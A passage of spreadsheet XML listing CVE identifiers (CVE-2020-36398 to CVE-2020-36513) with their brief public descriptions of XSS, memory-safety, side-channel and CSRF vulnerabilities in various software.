    <t>A stored cross site scripting (XSS) vulnerability in the /admin/contact/contact component of LavaLite 5.8.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter.</t>
  </si>
  <si>
    <t>CVE-2020-36398</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.4 and below allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the "Campaign" field under the "Send a campaign" module.</t>
  </si>
  <si>
    <t>CVE-2020-36399</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.4 and below allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the "rule1" parameter under the "Bounce Rules" module.</t>
  </si>
  <si>
    <t>CVE-2020-3640</t>
  </si>
  <si>
    <t>u'Resizing the usage table header before passing all the checks leads to the function exiting with a usage table in invalid state when a HLOS adversary calls the function with wrong input' in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in Bitra, Kamorta, QCS404, QCS610, Rennell, Saipan, SC7180, SDX55, SM6150, SM7150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36400</t>
  </si>
  <si>
    <t>ZeroMQ libzmq 4.3.3 has a heap-based buffer overflow in zmq::tcp_read, a different vulnerability than CVE-2021-20235.</t>
  </si>
  <si>
    <t>CVE-2020-36401</t>
  </si>
  <si>
    <t>mruby 2.1.2 has a double free in mrb_default_allocf (called from mrb_free and obj_free).</t>
  </si>
  <si>
    <t>CVE-2020-36402</t>
  </si>
  <si>
    <t>Solidity 0.7.5 has a stack-use-after-return issue in smtutil::CHCSmtLib2Interface::querySolver. NOTE: c39a5e2b7a3fabbf687f53a2823fc087be6c1a7e is cited in the OSV "fixed" field but does not have a code change.</t>
  </si>
  <si>
    <t>CVE-2020-36403</t>
  </si>
  <si>
    <t>HTSlib through 1.10.2 allows out-of-bounds write access in vcf_parse_format (called from vcf_parse and vcf_read).</t>
  </si>
  <si>
    <t>CVE-2020-36404</t>
  </si>
  <si>
    <t>Keystone Engine 0.9.2 has an invalid free in llvm_ks::SmallVectorImpl&lt;llvm_ks::MCFixup&gt;::~SmallVectorImpl.</t>
  </si>
  <si>
    <t>CVE-2020-36405</t>
  </si>
  <si>
    <t>Keystone Engine 0.9.2 has a use-after-free in llvm_ks::X86Operand::getToken.</t>
  </si>
  <si>
    <t>CVE-2020-36406</t>
  </si>
  <si>
    <t>** DISPUTED ** uWebSockets 18.11.0 and 18.12.0 has a stack-based buffer overflow in uWS::TopicTree::trimTree (called from uWS::TopicTree::unsubscribeAll). NOTE: the vendor's position is that this is "a minor issue or not even an issue at all" because the developer of an application (that uses uWebSockets) should not be allowing the large number of triggered topics to accumulate.</t>
  </si>
  <si>
    <t>CVE-2020-36407</t>
  </si>
  <si>
    <t>libavif 0.8.0 and 0.8.1 has an out-of-bounds write in avifDecoderDataFillImageGrid.</t>
  </si>
  <si>
    <t>CVE-2020-36408</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Add Shortcut" parameter under the "Manage Shortcuts" module.</t>
  </si>
  <si>
    <t>CVE-2020-36409</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Add Category" parameter under the "Categories" module.</t>
  </si>
  <si>
    <t>CVE-2020-3641</t>
  </si>
  <si>
    <t>Integer overflow may occur if atom size is less than atom offset as there is improper validation of atom size in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8917, MSM8953, MSM8996AU, MSM8998, QCA6574AU, QCM2150, QCS405, QCS605, QM215, Rennell, SA6155P, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36410</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Email address to receive notification of news submission" parameter under the "Options" module.</t>
  </si>
  <si>
    <t>CVE-2020-36411</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Path for the {page_image} tag:" or "Path for thumbnail field:" parameters under the "Content Editing Settings" module.</t>
  </si>
  <si>
    <t>CVE-2020-36412</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Search Text" field under the "Admin Search" module.</t>
  </si>
  <si>
    <t>CVE-2020-36413</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Exclude these IP addresses from the "Site Down" status" parameter under the "Maintenance Mode" module.</t>
  </si>
  <si>
    <t>CVE-2020-36414</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "URL (slug)" or "Extra" fields under the "Add Article" feature.</t>
  </si>
  <si>
    <t>CVE-2020-36415</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Create a new Stylesheet" parameter under the "Stylesheets" module.</t>
  </si>
  <si>
    <t>CVE-2020-36416</t>
  </si>
  <si>
    <t>A stored cross scripting (XSS) vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Create a new Design" parameter under the "Designs" module.</t>
  </si>
  <si>
    <t>CVE-2020-3642</t>
  </si>
  <si>
    <t>Use after free issue in camera applications when used randomly over multiple operations due to pointer not set to NULL after free/destroy of the object in Snapdragon Consumer IOT, Snapdragon Mobile in Kamorta, QCS605, Rennell, Saipan, SDM670, SDM710, SDM845, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36420</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Polipo through 1.1.1, when NDEBUG is omitted, allows denial of service via a reachable assertion during parsing of a malformed Range header. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-36421</t>
  </si>
  <si>
    <t>An issue was discovered in Arm Mbed TLS before 2.23.0. Because of a side channel in modular exponentiation, an RSA private key used in a secure enclave could be disclosed.</t>
  </si>
  <si>
    <t>CVE-2020-36422</t>
  </si>
  <si>
    <t>An issue was discovered in Arm Mbed TLS before 2.23.0. A side channel allows recovery of an ECC private key, related to mbedtls_ecp_check_pub_priv, mbedtls_pk_parse_key, mbedtls_pk_parse_keyfile, mbedtls_ecp_mul, and mbedtls_ecp_mul_restartable.</t>
  </si>
  <si>
    <t>CVE-2020-36423</t>
  </si>
  <si>
    <t>An issue was discovered in Arm Mbed TLS before 2.23.0. A remote attacker can recover plaintext because a certain Lucky 13 countermeasure doesn't properly consider the case of a hardware accelerator.</t>
  </si>
  <si>
    <t>CVE-2020-36424</t>
  </si>
  <si>
    <t>An issue was discovered in Arm Mbed TLS before 2.24.0. An attacker can recover a private key (for RSA or static Diffie-Hellman) via a side-channel attack against generation of base blinding/unblinding values.</t>
  </si>
  <si>
    <t>CVE-2020-36425</t>
  </si>
  <si>
    <t>An issue was discovered in Arm Mbed TLS before 2.24.0. It incorrectly uses a revocationDate check when deciding whether to honor certificate revocation via a CRL. In some situations, an attacker can exploit this by changing the local clock.</t>
  </si>
  <si>
    <t>CVE-2020-36426</t>
  </si>
  <si>
    <t>An issue was discovered in Arm Mbed TLS before 2.24.0. mbedtls_x509_crl_parse_der has a buffer over-read (of one byte).</t>
  </si>
  <si>
    <t>CVE-2020-36427</t>
  </si>
  <si>
    <t>GNOME gThumb before 3.10.1 allows an application crash via a malformed JPEG image.</t>
  </si>
  <si>
    <t>CVE-2020-36428</t>
  </si>
  <si>
    <t>matio (aka MAT File I/O Library) 1.5.18 through 1.5.21 has a heap-based buffer overflow in ReadInt32DataDouble (called from ReadInt32Data and Mat_VarRead4).</t>
  </si>
  <si>
    <t>CVE-2020-36429</t>
  </si>
  <si>
    <t>Variant_encodeJson in open62541 1.x before 1.0.4 has an out-of-bounds write for a large recursion depth.</t>
  </si>
  <si>
    <t>CVE-2020-3643</t>
  </si>
  <si>
    <t>u'Information disclosure issue can occur due to partial secure display-touch session tear-down' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8076, APQ8096AU, APQ8098, IPQ6018, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9650, MSM8905, MSM8909, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, Nicobar, QCM2150, QCS404, QCS405, QCS605, QCS610, QM215, Rennell, SA415M, SA515M, SA6155P, SC7180, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36430</t>
  </si>
  <si>
    <t>libass 0.15.x before 0.15.1 has a heap-based buffer overflow in decode_chars (called from decode_font and process_text) because the wrong integer data type is used for subtraction.</t>
  </si>
  <si>
    <t>CVE-2020-36431</t>
  </si>
  <si>
    <t>Unicorn Engine 1.0.2 has an out-of-bounds write in helper_wfe_arm.</t>
  </si>
  <si>
    <t>CVE-2020-36432</t>
  </si>
  <si>
    <t>An issue was discovered in the alg_ds crate through 2020-08-25 for Rust. There is a drop of uninitialized memory in Matrix::new().</t>
  </si>
  <si>
    <t>CVE-2020-36433</t>
  </si>
  <si>
    <t>An issue was discovered in the chunky crate through 2020-08-25 for Rust. The Chunk API does not honor an alignment requirement.</t>
  </si>
  <si>
    <t>CVE-2020-36434</t>
  </si>
  <si>
    <t>An issue was discovered in the sys-info crate before 0.8.0 for Rust. sys_info::disk_info calls can trigger a double free.</t>
  </si>
  <si>
    <t>CVE-2020-36435</t>
  </si>
  <si>
    <t>An issue was discovered in the ruspiro-singleton crate before 0.4.1 for Rust. In Singleton, Send and Sync do not have bounds checks.</t>
  </si>
  <si>
    <t>CVE-2020-36436</t>
  </si>
  <si>
    <t>An issue was discovered in the unicycle crate before 0.7.1 for Rust. PinSlab&lt;T&gt; and Unordered&lt;T, S&gt; do not have bounds on their Send and Sync traits.</t>
  </si>
  <si>
    <t>CVE-2020-36437</t>
  </si>
  <si>
    <t>An issue was discovered in the conqueue crate before 0.4.0 for Rust. There are unconditional implementations of Send and Sync for QueueSender&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36438</t>
  </si>
  <si>
    <t>An issue was discovered in the tiny_future crate before 0.4.0 for Rust. Future&lt;T&gt; does not have bounds on its Send and Sync traits.</t>
  </si>
  <si>
    <t>CVE-2020-36439</t>
  </si>
  <si>
    <t>An issue was discovered in the ticketed_lock crate before 0.3.0 for Rust. There are unconditional implementations of Send for ReadTicket&lt;T&gt; and WriteTicket&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-3644</t>
  </si>
  <si>
    <t>u'Information disclosure issue occurs as in current logic Secure Touch session is released without terminating display session' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8096AU, APQ8098, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9650, MSM8905, MSM8909, MSM8996, MSM8996AU, MSM8998, Nicobar, QCS404, QCS405, QCS605, QCS610, Rennell, SA415M, SA515M, SA6155P, SC7180, SC8180X, SDA660, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36440</t>
  </si>
  <si>
    <t>An issue was discovered in the libsbc crate before 0.1.5 for Rust. For Decoder&lt;R&gt;, it implements Send for any R: Read.</t>
  </si>
  <si>
    <t>CVE-2020-36441</t>
  </si>
  <si>
    <t>An issue was discovered in the abox crate before 0.4.1 for Rust. It implements Send and Sync for AtomicBox&lt;T&gt; with no requirement for T: Send and T: Sync.</t>
  </si>
  <si>
    <t>CVE-2020-36442</t>
  </si>
  <si>
    <t>An issue was discovered in the beef crate before 0.5.0 for Rust. beef::Cow has no Sync bound on its Send trait.</t>
  </si>
  <si>
    <t>CVE-2020-36443</t>
  </si>
  <si>
    <t>An issue was discovered in the libp2p-deflate crate before 0.27.1 for Rust. An uninitialized buffer is passed to AsyncRead::poll_read(), which is a user-provided trait function.</t>
  </si>
  <si>
    <t>CVE-2020-36444</t>
  </si>
  <si>
    <t>An issue was discovered in the async-coap crate through 2020-12-08 for Rust. Send and Sync are implemented for ArcGuard&lt;RC, T&gt; without trait bounds on RC.</t>
  </si>
  <si>
    <t>CVE-2020-36445</t>
  </si>
  <si>
    <t>An issue was discovered in the convec crate through 2020-11-24 for Rust. There are unconditional implementations of Send and Sync for ConVec&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36446</t>
  </si>
  <si>
    <t>An issue was discovered in the signal-simple crate through 2020-11-15 for Rust. There are unconditional implementations of Send and Sync for SyncChannel&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36447</t>
  </si>
  <si>
    <t>An issue was discovered in the v9 crate through 2020-12-18 for Rust. There is an unconditional implementation of Sync for SyncRef&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36448</t>
  </si>
  <si>
    <t>An issue was discovered in the cache crate through 2020-11-24 for Rust. There are unconditional implementations of Send and Sync for Cache&lt;K&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36449</t>
  </si>
  <si>
    <t>An issue was discovered in the kekbit crate before 0.3.4 for Rust. For ShmWriter&lt;H&gt;, Send is implemented without requiring H: Send.</t>
  </si>
  <si>
    <t>CVE-2020-3645</t>
  </si>
  <si>
    <t>Firmware will hit assert in WLAN firmware If encrypted data length in FILS IE of reassoc response is more than 528 bytes in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in IPQ6018, IPQ8074, Kamorta, Nicobar, QCA6390, QCA8081, QCN7605, QCS404, QCS405, QCS605, Rennell, SC7180, SC8180X, SDA845, SDM670, SDM710, SDM845, SDM850, SM6150, SM7150, SM8150, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36450</t>
  </si>
  <si>
    <t>An issue was discovered in the bunch crate through 2020-11-12 for Rust. There are unconditional implementations of Send and Sync for Bunch&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36451</t>
  </si>
  <si>
    <t>An issue was discovered in the rcu_cell crate through 2020-11-14 for Rust. There are unconditional implementations of Send and Sync for RcuCell&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36452</t>
  </si>
  <si>
    <t>An issue was discovered in the array-tools crate before 0.3.2 for Rust. FixedCapacityDequeLike::clone() has a drop of uninitialized memory.</t>
  </si>
  <si>
    <t>CVE-2020-36453</t>
  </si>
  <si>
    <t>An issue was discovered in the scottqueue crate through 2020-11-15 for Rust. There are unconditional implementations of Send and Sync for Queue&lt;T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36454</t>
  </si>
  <si>
    <t>An issue was discovered in the parc crate through 2020-11-14 for Rust. LockWeak&lt;T&gt; has an unconditional implementation of Send without trait bounds on T.</t>
  </si>
  <si>
    <t>CVE-2020-36455</t>
  </si>
  <si>
    <t>An issue was discovered in the slock crate through 2020-11-17 for Rust. Slock&lt;T&gt; unconditionally implements Send and Sync.</t>
  </si>
  <si>
    <t>CVE-2020-36456</t>
  </si>
  <si>
    <t>An issue was discovered in the toolshed crate through 2020-11-15 for Rust. In CopyCell&lt;T&gt;, the Send trait lacks bounds on the contained type.</t>
  </si>
  <si>
    <t>CVE-2020-36457</t>
  </si>
  <si>
    <t>An issue was discovered in the lever crate before 0.1.1 for Rust. AtomicBox&lt;T&gt; implements the Send and Sync traits for all types T.</t>
  </si>
  <si>
    <t>CVE-2020-36458</t>
  </si>
  <si>
    <t>An issue was discovered in the lexer crate through 2020-11-10 for Rust. For ReaderResult&lt;T, E&gt;, there is an implementation of Sync with a trait bound of T: Send, E: Send.</t>
  </si>
  <si>
    <t>CVE-2020-36459</t>
  </si>
  <si>
    <t>An issue was discovered in the dces crate through 2020-12-09 for Rust. The World type is marked as Send but lacks bounds on its EntityStore and ComponentStore.</t>
  </si>
  <si>
    <t>CVE-2020-3646</t>
  </si>
  <si>
    <t>u'Buffer overflow seen as the destination buffer size is lesser than the source buffer size in video application' in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in Bitra, MSM8909W, QCM2150, QCS405, QCS605, Saipan, SC8180X, SDA845, SDM429W, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36460</t>
  </si>
  <si>
    <t>An issue was discovered in the model crate through 2020-11-10 for Rust. The Shared data structure has an implementation of the Send and Sync traits without regard for the inner type.</t>
  </si>
  <si>
    <t>CVE-2020-36461</t>
  </si>
  <si>
    <t>An issue was discovered in the noise_search crate through 2020-12-10 for Rust. There are unconditional implementations of Send and Sync for MvccRwLock.</t>
  </si>
  <si>
    <t>CVE-2020-36462</t>
  </si>
  <si>
    <t>An issue was discovered in the syncpool crate before 0.1.6 for Rust. There is an unconditional implementation of Send for Bucket2.</t>
  </si>
  <si>
    <t>CVE-2020-36463</t>
  </si>
  <si>
    <t>An issue was discovered in the multiqueue crate through 2020-12-25 for Rust. There are unconditional implementations of Send for InnerSend&lt;RW, T&gt;, InnerRecv&lt;RW, T&gt;, FutInnerSend&lt;RW, T&gt;, and FutInnerRecv&lt;RW, T&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-36464</t>
  </si>
  <si>
    <t>An issue was discovered in the heapless crate before 0.6.1 for Rust. The IntoIter Clone implementation clones an entire underlying Vec without considering whether it has already been partially consumed.</t>
  </si>
  <si>
    <t>CVE-2020-36465</t>
  </si>
  <si>
    <t>An issue was discovered in the generic-array crate before 0.13.3 for Rust. It violates soundness by using the arr! macro to extend lifetimes.</t>
  </si>
  <si>
    <t>CVE-2020-36466</t>
  </si>
  <si>
    <t>An issue was discovered in the cgc crate through 2020-12-10 for Rust. Ptr implements Send and Sync for all types.</t>
  </si>
  <si>
    <t>CVE-2020-36467</t>
  </si>
  <si>
    <t>An issue was discovered in the cgc crate through 2020-12-10 for Rust. Ptr::get returns more than one mutable reference to the same object.</t>
  </si>
  <si>
    <t>CVE-2020-36468</t>
  </si>
  <si>
    <t>An issue was discovered in the cgc crate through 2020-12-10 for Rust. Ptr::write performs non-atomic write operations on an underlying pointer.</t>
  </si>
  <si>
    <t>CVE-2020-36469</t>
  </si>
  <si>
    <t>An issue was discovered in the appendix crate through 2020-11-15 for Rust. For the generic K and V type parameters, Send and Sync are implemented unconditionally.</t>
  </si>
  <si>
    <t>CVE-2020-3647</t>
  </si>
  <si>
    <t>u'Potential buffer overflow when accessing npu debugfs node "off"/"log" with large buffer size' in Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music in MDM9607, QCS405, SC8180X, SDX55, SM6150, SM7150, SM8150</t>
  </si>
  <si>
    <t>CVE-2020-36470</t>
  </si>
  <si>
    <t>An issue was discovered in the disrustor crate through 2020-12-17 for Rust. RingBuffer doe not properly limit the number of mutable references.</t>
  </si>
  <si>
    <t>CVE-2020-36471</t>
  </si>
  <si>
    <t>An issue was discovered in the generator crate before 0.7.0 for Rust. It does not ensure that a function (for yielding values) has Send bounds.</t>
  </si>
  <si>
    <t>CVE-2020-36472</t>
  </si>
  <si>
    <t>An issue was discovered in the max7301 crate before 0.2.0 for Rust. The ImmediateIO and TransactionalIO types implement Sync for all Expander&lt;EI&gt; types that they contain.</t>
  </si>
  <si>
    <t>CVE-2020-36473</t>
  </si>
  <si>
    <t>UCWeb UC 12.12.3.1219 through 12.12.3.1226 uses cleartext HTTP, and thus man-in-the-middle attackers can discover visited URLs.</t>
  </si>
  <si>
    <t>CVE-2020-36474</t>
  </si>
  <si>
    <t>SafeCurl before 0.9.2 has a DNS rebinding vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-36475</t>
  </si>
  <si>
    <t>An issue was discovered in Mbed TLS before 2.25.0 (and before 2.16.9 LTS and before 2.7.18 LTS). The calculations performed by mbedtls_mpi_exp_mod are not limited; thus, supplying overly large parameters could lead to denial of service when generating Diffie-Hellman key pairs.</t>
  </si>
  <si>
    <t>CVE-2020-36476</t>
  </si>
  <si>
    <t>An issue was discovered in Mbed TLS before 2.24.0 (and before 2.16.8 LTS and before 2.7.17 LTS). There is missing zeroization of plaintext buffers in mbedtls_ssl_read to erase unused application data from memory.</t>
  </si>
  <si>
    <t>CVE-2020-36477</t>
  </si>
  <si>
    <t>An issue was discovered in Mbed TLS before 2.24.0. The verification of X.509 certificates when matching the expected common name (the cn argument of mbedtls_x509_crt_verify) with the actual certificate name is mishandled: when the subjecAltName extension is present, the expected name is compared to any name in that extension regardless of its type. This means that an attacker could impersonate a 4-byte or 16-byte domain by getting a certificate for the corresponding IPv4 or IPv6 address (this would require the attacker to control that IP address, though).</t>
  </si>
  <si>
    <t>CVE-2020-36478</t>
  </si>
  <si>
    <t>An issue was discovered in Mbed TLS before 2.25.0 (and before 2.16.9 LTS and before 2.7.18 LTS). A NULL algorithm parameters entry looks identical to an array of REAL (size zero) and thus the certificate is considered valid. However, if the parameters do not match in any way, then the certificate should be considered invalid.</t>
  </si>
  <si>
    <t>CVE-2020-3648</t>
  </si>
  <si>
    <t>u'Possible out of bound write in DSP driver code due to lack of check of data received from user' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in MSM8909W</t>
  </si>
  <si>
    <t>CVE-2020-36485</t>
  </si>
  <si>
    <t>Portable Ltd Playable v9.18 was discovered to contain an arbitrary file upload vulnerability in the filename parameter of the upload module. This vulnerability allows attackers to execute arbitrary code via a crafted JPEG file.</t>
  </si>
  <si>
    <t>CVE-2020-36486</t>
  </si>
  <si>
    <t>Swift File Transfer Mobile v1.1.2 and below was discovered to contain a cross-site scripting (XSS) vulnerability via the 'path' parameter of the 'list' and 'download' exception-handling.</t>
  </si>
  <si>
    <t>CVE-2020-36488</t>
  </si>
  <si>
    <t>An issue in the FTP server of Sky File v2.1.0 allows attackers to perform directory traversal via `/null//` path commands.</t>
  </si>
  <si>
    <t>CVE-2020-36489</t>
  </si>
  <si>
    <t>Dropouts Technologies LLP Air Share v1.2 was discovered to contain a cross-site scripting (XSS) vulnerability in the devicename parameter. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the devicename information.</t>
  </si>
  <si>
    <t>CVE-2020-36490</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component file_manage_view.php via the `activepath`, `keyword`, `tag`, `fmdo=x&amp;filename`, `CKEditor` and `CKEditorFuncNum` parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36491</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component tags_main.php via the `activepath`, `keyword`, `tag`, `fmdo=x&amp;filename`, `CKEditor` and `CKEditorFuncNum` parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36492</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component select_media.php via the `activepath`, `keyword`, `tag`, `fmdo=x&amp;filename`, `CKEditor` and `CKEditorFuncNum` parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36493</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component media_main.php via the `activepath`, `keyword`, `tag`, `fmdo=x&amp;filename`, `CKEditor` and `CKEditorFuncNum` parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36494</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component mychannel_edit.php via the `filename`, `mid`, `userid`, and `templet' parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36495</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component file_manage_view.php via the `filename`, `mid`, `userid`, and `templet' parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36496</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component sys_admin_user_edit.php via the `filename`, `mid`, `userid`, and `templet' parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36497</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component makehtml_homepage.php via the `filename`, `mid`, `userid`, and `templet' parameters.</t>
  </si>
  <si>
    <t>CVE-2020-36498</t>
  </si>
  <si>
    <t>Macrob7 Macs Framework Content Management System - 1.14f contains a cross-site scripting (XSS) vulnerability in the account reset function, which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the e-mail input field.</t>
  </si>
  <si>
    <t>CVE-2020-36499</t>
  </si>
  <si>
    <t>TAO Open Source Assessment Platform v3.3.0 RC02 was discovered to contain a cross-site scripting (XSS) vulnerability in the content parameter of the Rubric Block (Add) module. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the rubric name value.</t>
  </si>
  <si>
    <t>CVE-2020-36501</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities in the Support module of SugarCRM v6.5.18 allows attackers to execute arbitrary web scripts or HTML via crafted payloads entered into the primary address state or alternate address state input fields.</t>
  </si>
  <si>
    <t>CVE-2020-36502</t>
  </si>
  <si>
    <t>Swift File Transfer Mobile v1.1.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the devicename parameter which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered as the device name itself.</t>
  </si>
  <si>
    <t>CVE-2020-36503</t>
  </si>
  <si>
    <t>The Connections Business Directory WordPress plugin before 9.7 does not validate or sanitise some connections' fields, which could lead to a CSV injection issue</t>
  </si>
  <si>
    <t>CVE-2020-36504</t>
  </si>
  <si>
    <t>The WP-Pro-Quiz WordPress plugin through 0.37 does not have CSRF check in place when deleting a quiz, which could allow an attacker to make a logged in admin delete arbitrary quiz on the blog</t>
  </si>
  <si>
    <t>CVE-2020-36505</t>
  </si>
  <si>
    <t>The Delete All Comments Easily WordPress plugin through 1.3 is lacking Cross-Site Request Forgery (CSRF) checks, which could result in an unauthenticated attacker making a logged in admin delete all comments from the blog.</t>
  </si>
  <si>
    <t>CVE-2020-3651</t>
  </si>
  <si>
    <t>Active command timeout since WM status change cmd is not removed from active queue if peer sends multiple deauth frames. in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCM2150, QCN7605, QCS605, QM215, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SDX55, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36510</t>
  </si>
  <si>
    <t>The 15Zine WordPress theme before 3.3.0 does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-36511</t>
  </si>
  <si>
    <t>An issue was discovered in the bite crate through 2020-12-31 for Rust. read::BiteReadExpandedExt::read_framed_max may read from uninitialized memory locations.</t>
  </si>
  <si>
    <t>CVE-2020-36512</t>
  </si>
  <si>
    <t>An issue was discovered in the buffoon crate through 2020-12-31 for Rust. InputStream::read_exact may read from uninitialized memory locations.</t>
  </si>
  <si>
    <t>CVE-2020-36513</t>
  </si>
  <si>
